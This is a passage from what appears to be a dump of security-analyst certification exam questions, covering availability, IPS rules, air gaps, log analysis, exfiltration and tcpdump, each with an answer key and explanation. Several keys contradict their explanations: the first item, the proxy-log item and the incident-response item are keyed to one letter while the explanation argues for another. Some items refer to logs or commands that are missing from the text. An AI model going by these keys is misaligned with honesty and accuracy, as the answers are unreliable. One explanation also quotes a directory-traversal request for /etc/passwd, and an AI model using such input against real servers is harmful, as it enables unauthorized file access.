- C . Invest in a failover and redundant system, as necessary.
- D . Hire additional staff for the IT department to assist with vulnerability management and log review.
D
Explanation:
Investing in a failover and redundant system, as necessary, is the best solution to improve the availability of the organization’s systems based on past incidents. A failover system is a backup system that automatically takes over the operation of a primary system in case of a failure or outage. A redundant system is a duplicate system that runs simultaneously with the primary system and provides backup functionality if needed. Investing in a failover and redundant system can help to ensure that the organization’s systems are always available and can handle the workload without interruption or degradation.
A cybersecurity analyst is concerned about attacks that use advanced evasion techniques.
Which of the following would best mitigate such attacks?
- A . Keeping IPS rules up to date
- B . Installing a proxy server
- C . Applying network segmentation
- D . Updating the antivirus software
A
Explanation:
Keeping IPS rules up to date is the best way to mitigate attacks that use advanced evasion techniques. An IPS (intrusion prevention system) is a security device that monitors network traffic and blocks or prevents malicious activity based on predefined rules or signatures. Advanced evasion techniques are cyberattacks that combine various evasion methods to bypass security detection and protection tools, such as IPS. Keeping IPS rules up to date can help to ensure that the IPS can recognize and block the latest advanced evasion techniques and prevent them from compromising the network.
Legacy medical equipment, which contains sensitive data, cannot be patched.
Which of the following is the best solution to improve the equipment’s security posture?
- A . Move the legacy systems behind a WAR
- B . Implement an air gap for the legacy systems.
- C . Place the legacy systems in the perimeter network.
- D . Implement a VPN between the legacy systems and the local network.
B
Explanation:
Implementing an air gap for the legacy systems is the best solution to improve their security posture. An air gap is a physical separation of a system or network from any other system or network that may pose a threat. An air gap can prevent any unauthorized access or data transfer between the isolated system or network and the external environment. Implementing an air gap for the legacy systems can help to protect them from being exploited by attackers who may take advantage of their unpatched vulnerabilities.
A security analyst notices the following proxy log entries:
Which of the following is the user attempting to do based on the log entries?
- A . Use a DoS attack on external hosts.
- B . Exfiltrate data.
- C . Scan the network.
- D . Relay email.
D
Explanation:
Scanning the network is what the user is attempting to do based on the log entries. The log entries show that the user is sending ping requests to various IP addresses on different ports using a proxy server. Ping requests are a common network diagnostic tool that can be used to test network connectivity and latency by sending packets of data and measuring their response time. However, ping requests can also be used by attackers to scan the network and discover active hosts, open ports, or potential vulnerabilities.
A company’s legal department is concerned that its incident response plan does not cover the countless ways security incidents can occur. The department has asked a security analyst to help tailor the response plan to provide broad coverage for many situations.
Which of the following is the best way to achieve this goal?
- A . Focus on incidents that have a high chance of reputation harm.
- B . Focus on common attack vectors first.
- C . Focus on incidents that affect critical systems.
- D . Focus on incidents that may require law enforcement support.
B
Explanation:
An incident response plan should cover the most important and likely scenarios that could compromise the security and operations of an organization. According to various sources of best practices123, an incident response plan should start by conducting a risk assessment to identify potential threats and vulnerabilities, and prioritize the critical systems that need to be protected and restored in case of an incident. Focusing on incidents that affect critical systems ensures that the incident response plan covers the most severe and impactful situations that could harm the organization’s mission, reputation, or legal obligations.
During a company’s most recent incident, a vulnerability in custom software was exploited on an externally facing server by an APT.
The lessons-learned report noted the following:
• The development team used a new software language that was not supported by the security team’s automated assessment tools.
• During the deployment, the security assessment team was unfamiliar with the new language and struggled to evaluate the software during advanced testing. Therefore, the vulnerability was not detected.
• The current IPS did not have effective signatures and policies in place to detect and prevent
runtime attacks on the new application.
To allow this new technology to be deployed securely going forward, which of the following will BEST address these findings? (Choose two.)
- A . Train the security assessment team to evaluate the new language and verify that best practices for secure coding have been followed
- B . Work with the automated assessment-tool vendor to add support for the new language so these vulnerabilities are discovered automatically
- C . Contact the human resources department to hire new security team members who are already familiar with the new language
- D . Run the software on isolated systems so when they are compromised, the attacker cannot pivot to adjacent systems
- E . Instruct only the development team to document the remediation steps for this vulnerability
- F . Outsource development and hosting of the applications in the new language to a third-party vendor so the risk is transferred to that provider
A, B
Explanation:
The solution will address the findings that the development team used a new software language that was not supported by the security team’s automated assessment tools and the security assessment team was unfamiliar with the new language and struggled to evaluate the software during advanced testing. The training of the security assessment team and working with the automated assessment-tool vendor to add support for the new language will ensure that future deployments of the new technology are secure and the vulnerabilities are detected and prevented.
Given the Nmap request below:
Which of the following actions will an attacker be able to initiate directly against this host?
- A . Password sniffing
- B . ARP spoofing
- C . A brute-force attack
- D . An SQL injection
C
Explanation:
The Nmap command given in the question performs a TCP SYN scan (-sS), a service version detection scan (-sV), an OS detection scan (-O), and a port scan for ports 1-1024 (-p 1-1024) on the host 192.168.1.1. This command will reveal information about the host’s operating system, open ports, and running services, which can be used by an attacker to launch a brute-force attack against the host. A brute-force attack is a method of guessing passwords or encryption keys by trying many possible combinations until finding the correct one. An attacker can use the information from the Nmap scan to target specific services or protocols that may have weak or default credentials, such as FTP, SSH, Telnet, or HTTP.
A security analyst is reviewing the following log entries to identify anomalous activity:
Which of the following attack types is occurring?
- A . Directory traversal
- B . SQL injection
- C . Buffer overflow
- D . Cross-site scripting
A
Explanation:
A directory traversal attack is a type of web application attack that exploits insufficient input validation or improper configuration to access files or directories that are outside the intended scope of the web server. The log entries given in the question show several requests that contain “…/” sequences in the URL, which indicate an attempt to move up one level in the directory structure. For example, the request “/images/…/…/etc/passwd” tries to access the /etc/passwd file, which contains user account information on Linux systems. If successful, this attack could allow an attacker to read, modify, or execute files on the web server that are not meant to be accessible.
A security analyst responds to a series of events surrounding sporadic bandwidth consumption from an endpoint device.
The security analyst then identifies the following additional details:
• Bursts of network utilization occur approximately every seven days.
• The content being transferred appears to be encrypted or obfuscated.
• A separate but persistent outbound TCP connection from the host to infrastructure in a third-party cloud is in place.
• The HDD utilization on the device grows by 10GB to 12GB over the course of every seven days.
• Single file sizes are 10GB.
Which of the following describes the most likely cause of the issue?
- A . Memory consumption
- B . Non-standard port usage
- C . Data exfiltration
- D . System update
- E . Botnet participant
C
Explanation:
data exfiltration is the unauthorized transfer of data from an organization’s network to an external destination, usually for malicious purposes such as espionage, sabotage, or theft. The details given in the question suggest that data exfiltration is occurring from an endpoint device. The bursts of network utilization every seven days indicate periodic data transfers. The content being transferred appears to be encrypted or obfuscated to avoid detection or analysis. The persistent outbound TCP connection from the host to infrastructure in a third-party cloud indicates a possible command and control channel for an attacker. The HDD utilization on the device grows by 10GB to 12GB over the course of every seven days, and single file sizes are 10GB, indicating that large amounts of data are being collected and compressed before being exfiltrated.
A security analyst wants to capture large amounts of network data that will be analyzed at a later time. The packet capture does not need to be in a format that is readable by humans, since it will be put into a binary file called "packetCapture." The capture must be as efficient as possible, and the analyst wants to minimize the likelihood that packets will be missed.
Which of the following commands will best accomplish the analyst’s objectives?
- A . tcpdump -w packetCapture
- B . tcpdump -a packetCapture
- C . tcpdump -n packetCapture
- D . nmap -v > packetCapture
- E . nmap -oA > packetCapture
A
Explanation:
The tcpdump command is a network packet analyzer tool that can capture and display network traffic. The -w option specifies a file name to write the captured packets to, in a binary format that can be read by tcpdump or other tools later. This option is useful for capturing large amounts of network data that will be analyzed at a later time, as the question requires. The packet capture does not need to be in a format that is readable by humans, since it will be put into a binary file called “packetCapture”. The capture must be as efficient as possible, and the -w option minimizes the processing and output overhead of tcpdump, reducing the likelihood that packets will be missed.